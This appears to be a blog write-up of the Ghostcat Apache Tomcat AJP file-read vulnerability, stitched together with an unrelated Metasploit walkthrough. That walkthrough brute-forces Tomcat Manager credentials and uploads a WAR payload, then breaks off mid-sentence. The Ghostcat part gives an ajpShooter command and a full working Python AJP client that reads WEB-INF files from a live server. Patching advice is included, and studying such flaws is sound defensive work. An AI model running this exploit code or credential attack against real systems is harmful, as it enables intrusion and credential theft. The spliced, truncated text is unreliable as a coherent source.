To continue my theme of better late than never, I have a quick write-up of the Ghostcat vulnerability (CVE-2020-1938). Probably old news to most, but I wanted to get my learning down on "paper" to help me organise my thoughts. I will start with a few definitions and then move on to the POC and remediation.

Tomcat is an open-source Java servlet container (and web server) from the Apache Software Foundation. During its time it has seen its fair share of vulnerabilities: a quick search with searchsploit or on ExploitDB reveals a list of potential weaknesses if the latest version is not installed.

Apache Jserv Protocol (AJP)

AJP is a binary protocol that lets a front-end web server (typically Apache httpd with mod_jk or mod_proxy_ajp) proxy inbound requests into the application server behind it. Communication with the servlet container is conducted over TCP, and once a connection is assigned to a particular request it will not be used for any other until the request-handling cycle has terminated. By default the AJP connector listens on port 8009, so if you see that on an Nmap scan you know what to look for.

To make matters worse, the connector carries a lot of built-in trust: Tomcat accepts whatever request attributes the front-end sends, because the front-end is assumed to be the only thing talking to it. This of course means that it should never be exposed to the internet.

Ghostcat is a local file inclusion (LFI) vulnerability reached through AJP: a client that can reach the connector sets the javax.servlet.include.* request attributes, and Tomcat's default servlet serves the named file from the web application's root, WEB-INF included. This means it can be exploited to read restricted web app files on the app server. Where the application allows file uploads into its document root, the same mechanism can include an uploaded file and have it interpreted as a JSP, which turns the read into remote code execution. It affects all unpatched versions of Apache Tomcat; the fixed releases are 9.0.31, 8.5.51 and 7.0.100.

POC

For the POC I am using a newly published training room for the Ghostcat exploit. Rather than fighting with the AJP requests by hand, there is a simple tool, ajpShooter, that can be used to send the required data to exploit the LFI.

In the following example we have found a Tomcat web server, and after an Nmap scan we have found port 8009 to be open. The LFI is confined to the web application's own directory, so some googling presents the default layout of a deployed application:

WEB-INF/ (web.xml, classes/, lib/)

To look through what we have we can check these with ajpShooter using the following command (as copied here it is missing the tool's first argument, the target's HTTP URL):

python3 ajpShooter.py 8009 /WEB-INF/web.xml read

In this instance this results in the reading of the restricted file web.xml, which leaks a password.

Tomcat has since fixed the issue (in the fixed releases the AJP connector is disabled by default, binds to the loopback address, and refuses requests without a shared secret unless secretRequired="false" is set), so the best way to protect yourself is to update. If you must run AJP, keep the connector bound to localhost or firewalled from anything that is not your front-end, and set a secret.

Any comments or questions, please contact me on twitter at the link at the top of the page.

Copied from my old blog published 3 April 2020.

In this article we will focus on the Apache Tomcat web server and how we can discover the administrator's credentials in order to gain access to the remote system. So we are performing our internal penetration test and we have discovered Apache Tomcat running on a remote system on port 8180.

Our next step will be to open the Metasploit framework and to search for Tomcat-specific modules with the command search tomcat. We have found an auxiliary scanner which will be the tool for our attempt to log in to the Tomcat Manager application. So we select the scanner with the command use auxiliary/scanner/http/tomcat_mgr_login and then configure it properly, as it appears in the next screenshot.

We don't have to give a path for a password list in this module because it already defaults to Metasploit's own Tomcat Manager wordlists. However, if we have a bigger wordlist than the existing one we can select our own. So we run the scanner and wait to see if it discovers any valid credentials.

Discovery of valid credentials in Apache Tomcat

The scanner has discovered valid credentials: username tomcat and password tomcat. Now it is time to select the appropriate exploit in order to gain access to the remote target through the Apache Tomcat service. The Metasploit framework has a specific module which can be used to execute a payload on Apache Tomcat servers that are running the Manager application (exploit/multi/http/tomcat_mgr_upload, or the older tomcat_mgr_deploy).

We can see from the above image that there is an option for a username and an option for a password to authenticate with the application in order to deliver the exploit. We already have valid credentials for this server from our previous scan, so we will use them. The next image shows how we have configured the exploit.

We will use port 8180 instead of 80 because this is the port that Apache Tomcat is running on. Also, as you can see, it is important to set any valid credentials that you have discovered.

Exploitation of Apache Tomcat

As you can see, the exploit is uploading the payload as a .war archive and then it tries to execute the
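To show what ajpShooter is doing under the hood in the POC above, here is an added example (my own code, not ajpShooter's or Tomcat's) of a minimal AJP13 client. It builds the forward request that carries the javax.servlet.include.* attributes Ghostcat relies on, parses the packets the container sends back, and can also carry the AJP shared secret that the fixed Tomcat releases demand, which is why the same request bounces off a patched server. The host name, port and file path are placeholders, the attribute values are the ones public Ghostcat PoCs use, and sample_response is a constructed reply so the parser can be exercised offline.

```python
"""Minimal AJP13 client reproducing the Ghostcat file read (added example)."""
import socket
import struct

AJP_MAGIC_REQ = b"\x12\x34"   # web server -> container
AJP_MAGIC_RESP = b"AB"        # container -> web server
JK_FORWARD_REQUEST, METHOD_GET = 0x02, 0x02
SC_A_REQ_ATTRIBUTE, SC_A_SECRET, SC_A_ARE_DONE = 0x0A, 0x0C, 0xFF
SC_REQ_HOST = 0xA00B          # coded request header name "Host"
SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE, GET_BODY_CHUNK = 3, 4, 5, 6
RESP_HEADER_NAMES = {0xA001: "Content-Type", 0xA002: "Content-Language",
                     0xA003: "Content-Length", 0xA004: "Date", 0xA005: "Last-Modified",
                     0xA006: "Location", 0xA007: "Set-Cookie", 0xA008: "Set-Cookie2",
                     0xA009: "Servlet-Engine", 0xA00A: "Status", 0xA00B: "WWW-Authenticate"}


def ajp_string(s):
    """AJP string: 2-byte big-endian length, the bytes, a NUL; None is 0xFFFF."""
    if s is None:
        return b"\xff\xff"
    data = s.encode()
    return struct.pack(">H", len(data)) + data + b"\x00"


def read_string(buf, off):
    """Inverse of ajp_string; returns (str_or_None, new_offset)."""
    n = struct.unpack(">H", buf[off:off + 2])[0]
    if n == 0xFFFF:
        return None, off + 2
    return buf[off + 2:off + 2 + n].decode(errors="replace"), off + 2 + n + 1


def build_ghostcat_request(server_name, file_path, server_port=8080, secret=None):
    """FORWARD_REQUEST for '/' whose javax.servlet.include.* attributes make
    Tomcat's DefaultServlet resolve file_path (relative to the web app root,
    WEB-INF included) instead of the request URI. 'secret' is the AJP shared
    secret that fixed Tomcat releases require by default; without it they
    refuse the request. Values here are placeholders."""
    body = bytes([JK_FORWARD_REQUEST, METHOD_GET])
    body += ajp_string("HTTP/1.1") + ajp_string("/")            # protocol, req_uri
    body += ajp_string("127.0.0.1") + ajp_string(None)           # remote_addr, remote_host
    body += ajp_string(server_name) + struct.pack(">H", server_port) + b"\x00"  # is_ssl
    body += struct.pack(">H", 1) + struct.pack(">H", SC_REQ_HOST) + ajp_string(server_name)
    if secret is not None:
        body += bytes([SC_A_SECRET]) + ajp_string(secret)
    for name, value in (("javax.servlet.include.request_uri", "/"),
                        ("javax.servlet.include.servlet_path", "/"),
                        ("javax.servlet.include.path_info", file_path)):
        body += bytes([SC_A_REQ_ATTRIBUTE]) + ajp_string(name) + ajp_string(value)
    body += bytes([SC_A_ARE_DONE])
    return AJP_MAGIC_REQ + struct.pack(">H", len(body)) + body


def parse_ajp_responses(data):
    """Walk container->web server packets; returns (status, headers, body, ended)."""
    status, headers, body, ended, pos = None, {}, b"", False, 0
    while pos + 4 <= len(data) and not ended:
        if data[pos:pos + 2] != AJP_MAGIC_RESP:
            raise ValueError("bad AJP magic at offset %d" % pos)
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        if pos + 4 + length > len(data):
            break                                  # packet not fully received yet
        pkt, pos = data[pos + 4:pos + 4 + length], pos + 4 + length
        kind = pkt[0]
        if kind == SEND_HEADERS:
            status, off = struct.unpack(">H", pkt[1:3])[0], 3
            _msg, off = read_string(pkt, off)      # status message, e.g. "OK"
            count = struct.unpack(">H", pkt[off:off + 2])[0]
            off += 2
            for _ in range(count):
                if pkt[off] == 0xA0:               # coded header name
                    code = struct.unpack(">H", pkt[off:off + 2])[0]
                    name, off = RESP_HEADER_NAMES.get(code, "0x%04x" % code), off + 2
                else:
                    name, off = read_string(pkt, off)
                headers[name], off = read_string(pkt, off)
        elif kind == SEND_BODY_CHUNK:
            n = struct.unpack(">H", pkt[1:3])[0]
            body += pkt[3:3 + n]
        elif kind == END_RESPONSE:
            ended = True
        # GET_BODY_CHUNK is ignored: a GET carries no request body.
    return status, headers, body, ended


def read_file_over_ajp(host, ajp_port, file_path, secret=None):
    """Send the request to a live AJP connector and collect the reply."""
    with socket.create_connection((host, ajp_port), timeout=10) as sock:
        sock.sendall(build_ghostcat_request(host, file_path, secret=secret))
        data = b""
        while True:
            chunk = sock.recv(65536)
            if not chunk:
                break
            data += chunk
            status, headers, body, ended = parse_ajp_responses(data)
            if ended:
                return status, headers, body
    return parse_ajp_responses(data)[:3]


def sample_response(body):
    """Constructed reply (not captured traffic) shaped like a successful read."""
    hdr = bytes([SEND_HEADERS]) + struct.pack(">H", 200) + ajp_string("OK")
    hdr += struct.pack(">H", 1) + struct.pack(">H", 0xA001) + ajp_string("application/xml")
    chunk = bytes([SEND_BODY_CHUNK]) + struct.pack(">H", len(body)) + body + b"\x00"
    end = bytes([END_RESPONSE, 0x01])
    return b"".join(AJP_MAGIC_RESP + struct.pack(">H", len(p)) + p for p in (hdr, chunk, end))
```

Usage against a lab target is read_file_over_ajp("10.10.10.10", 8009, "/WEB-INF/web.xml"); a 200 with the descriptor in the body is the Ghostcat condition, while a patched connector with a secret configured drops the connection or answers with a 403 unless you pass the right secret.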